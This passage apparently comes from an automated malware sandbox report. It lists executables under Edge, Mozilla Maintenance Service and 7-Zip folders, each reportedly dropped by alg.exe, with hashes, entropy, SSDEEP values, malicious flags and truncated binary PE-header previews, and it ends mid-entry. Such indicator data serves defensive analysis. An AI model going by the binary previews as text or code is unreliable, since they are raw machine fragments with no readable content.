                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E57443A741C94760B5AD607EF6B6B12FBE26B0A0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:04CCA7F39450E607CBC923C0946A6E1C71DCE65AC3A81EE17B31D513DD2293E3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8F6FF01AECABBEB7D5E8E5D5AE0120DA024D92FD0D87C47BEAFDED57FF9B6498EAC1CB05AE25D802DE29F12C4292DDB75DE4994F213859A91719A50B92851B18
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.140942482666784
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:HiD2VmA1YXwHwlklb8boUuWPg2gc/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CD2VmAyiwIb8boQHLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2B91A537773F52B84B7A99D05762C50A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F89F09DCEDE197ABDAA09D33A92BCA4BE1406F16
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5EDC4AFBFEEE7DE384182A2223708448FBFEE026F2F87EC573AAFC0D0E4486E9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EE3CA6D9509A77611F156D2F12E460234FD58622BC121C517A756630E20BDE1667F49F60BFACA8125B86F0111F074B6FCB25995A008AF12768E00535A2D2D085
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......l4.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.161686555965827
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:swNHwoYhua6MtjRO4qbBJTY6mY1uIgJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:swNPdQO7BJTfmESLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:046AA8B832C84C0AB95EE936D772C7F1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5675A03670B2DF2487E9AF5E0EF8E09714622246
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8B07F32D6018E77F977F6A4C19A9670B2EB04E4E246C095B0E73ACB67E5F8513
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CCAB11EAA788E729CB3FD5841CF85405D303914B4D780D68D08894D078A46A21FB729CB10A77AF951D09B153079C96C1580BE7F9E901500C6BAABE04440D3EB4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1481216
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.699169608530082
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:tglbht6BHe/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2lNtqHeLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:6A4E873CF82C0FC8271E880382635A80
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3462F7D0AD0C35B7C96AC177963CA0445B8F2C65
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C3FC79CE4F5F57C64670A79D43F0EFDB14DF319F81584C4BC9CE9136DD035590
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:71184E43E31488641F6ACAE738CDF499115100137CC34C2B01C9EED792A5E25F10348CF26407898DC50431E8FAA614B1CEC28513261B7D8E39ED8CE60B0E25D3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@...........................!.............................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...p...0......................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.662255903694801
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:9IxkTBVS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ixk1VSLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:45A40CFE07E683A0F5B1ED4A6CE4D08C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EFABB8AEFEA4293577C2B5EE980C6FB2299B1C78
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:808403A2CFA8ADB48CF55A208E7C8F9EBB6C4F8CE16CAF53A67F0B9521506A87
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:66DD07B2C64629E46E068CFF2D5416E32013830B3E485C07CA6955A115541A66707D67FB8F780EB08E28FD3A6821DEBEF086293912A71BEA3EEFD57BC91DDBAE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................... .....2?......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1490944
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.7912214418940975
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:kcssmrj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Fb0LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:426865650B4632F9760FB9A68CC5BFF2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AC39A7BBD0BDD1516F7648FEF853197431EB6022
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A9E92DA2F3F1C769015FE47F43AF9207B3EED2135175662A52BE0110B011C86A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DD3486E8743CB01BB19A9CA3BDC333761E899FBE456926B0DBB1A62193B6D1C8ECE078D7945349737144AE876258BD0D2FF01EC0874BDCD45E15EB41AF4E7766
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@..............................!.....z..... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`........... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1539584
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.901280237252348
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:B0/cT++foSBWU2YxhkgI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:u/cK+foQWU2YnPILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E2083E4FE565E5914BAC074D8177BC75
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8F307406EC7C64C87D64B70F395A1F1B08DB53D0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:50AE6CCC40F4BE3FB4CC31245C67C1DD7C5DFB3B64EB16372AF54D911866871D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2F2BDB60CD07CF18F58C5C522908EE8AFB90B396DCA89178B91C4D887857A76FA654C38F50AA91454FECCA15225B36DCA1D37F51BF3A1C5081788F00DE065785
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@...........................".............................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.662316428728685
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:pbBRzBgo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9BRVgoLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9F888135E9243A47C7A54AC8FC1F5434
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3F7BCBA91E68A304D6C6C0638B7EDFB6E94AC137
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:092A5B18069DBF3C34D8AE84CBA86D0B5F8E0DFCF7868CAD968EE42ADE4C17D4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8DA95C4D10F85720224C0C9ACE3A0106A55B7C7A53107CC2A28B53A0E7D2F698E161537C9F35D6657043BBFEA9CDBF68E1FE716D966925AAC98D97E4907933B7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@........................... .....Y...........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.93883180102799
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:jy53w24gQu3TPZ2psFkiSqwoz6LNiXicJFFRGNzj3:jyFQgZqsFki+oz67wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:348E7A2C61B61CFFFD8BD924BAC4F5CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:405BEDF59A81AA650A8DCFD358F433668125D520
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F39E79C3AAC2DCA7E26446BC54B851B96A95EBA1BDCA72A2C20FDB6C50298D55
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CCB8044A3AEC7C77504E8AF58B248C718588971F280A1C3BF79E4D0ED47A4DA9AE362FEBE109514B13D3B7183F5E362E20F0BA2DF2F872246763E67DDBF42A8F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....b|!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879074990482017
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:mxLdxxHYxrxsxCJxPxkRQ4WtGxw4WmIGxjWxuxJx8DxHxp4WqGxVMxqC4WlbG4WC:AqWRERmnyXliUNqg/lnmD
                                                                                                                                                                                                                                                                                                                                                                                        MD5:827CE1E227825A1C7CD47C62512A1214
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D33F9439F7813C5CC344B002EEEEC35F8BF5FCDB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4FD2E87A5BBD9060DE2F9127DD2A39C334086579763B33FD3CD4F9A8333E1F8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0D6D1A1B11C4BB8D0F7EFBDFB24652500282B319F3B7050D8B08D4F1A785FCDED7E36C061E2CE476C9C895831E0147FAFC0D05BB2A6F43A446C43702B3346288
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Preview:2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-10-28 11:37:08-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-10-28 11:37:08-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-10-28 11:37:08-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-10-28 11:37:0

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.901598065158658
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:MQVTZu0JX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DVTZuSLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DF7731CD51167F1E9F73863D919CAC1B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3FCD0C1B60C190B1F840BF19811AD74191428FED
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6B8882DDED85C95AB2067BD6E3B3292525324AA050FA1459513D9DBC8AE9C12E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3EF99D1327D598D3E2CEFE73C7AD56FC7D22247CCA06EF6D9FF2BF9DD22043390A2555FF74B7A4801D7E6477F3B3A7C50B0BA4F7618E95BD8FB4EB0A280DDA3F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1839616
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.248889853974881
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Q+gkEHfh4Cow/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9gkE/S+LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F9E738FC2CF5A481BF10DB82FB02D604
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1521EDA352C08E2F6B09BCDAFC2BFD4A41E93E63
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:365F865318B3B23D647AA7C597C65F4F6CA0901A68BA584A19B69971295D08DE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:59832A26FC747CBB1670E7DBDF715855A11D7B13FE176ABE20F34548673E93528D77109B5E81C36606A7F1DEFA004E7B47A4FE7B5080BBB96DE9BA06C6145DA5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@..............................0'......].... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...`...........r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.091733774926007
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IBpDRmi78gkPXlyo0Gtjrf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cNRmi78gkPX4o0GtjDLNiXicJFFRGNzb
                                                                                                                                                                                                                                                                                                                                                                                        MD5:39ED93F77636D50B42683F9C5BD61C27
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:805584D1F82F504B0178F9106C57F1D1B518F6F3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F6BFA47CD9750266EF3491F61E683DE3F37CB35C4384EB998BF9E715468FB74
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D9CBB43ADCCCC9898521B1384E9E694CFA6A1CCF309549D26EE4771A788A10246DA8612848F101D5150DF7C8B2BD6313D386A0E21FA31F116E45C02CB1A06F22
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@......................................%.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.22265222311563
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:WLOS2oTPIXVw/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:G/TLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8BF6C5DB16141C2DA08B39DBBF1A7457
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D0EB3F75DDF04F771CD92CCCDD30455C6F4E63BE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:50FE31901E29C4B99F586E6085DDC0680B049D499414A56F7D77D31A103AA4D1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3A91BF2FBF94C92FFAB2B27BFE737E4953E8FC28DCC49F9B372F650DC0D804FEC18CB7AE25ED933B087C6CC9930F18BE25DFA6A8AB9405B35A018F443B00013F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................n.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1300992
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.534761145085648
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:nte/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:444226CD83D412D391E7A5F63AED9186
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:17754A6AA776C44DAC69EF2B1DB9491BC8614BD5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B3342626A1C2F6020F13B3B1A6B1A652422C128CE2F8979584DF1A0FC43227E3
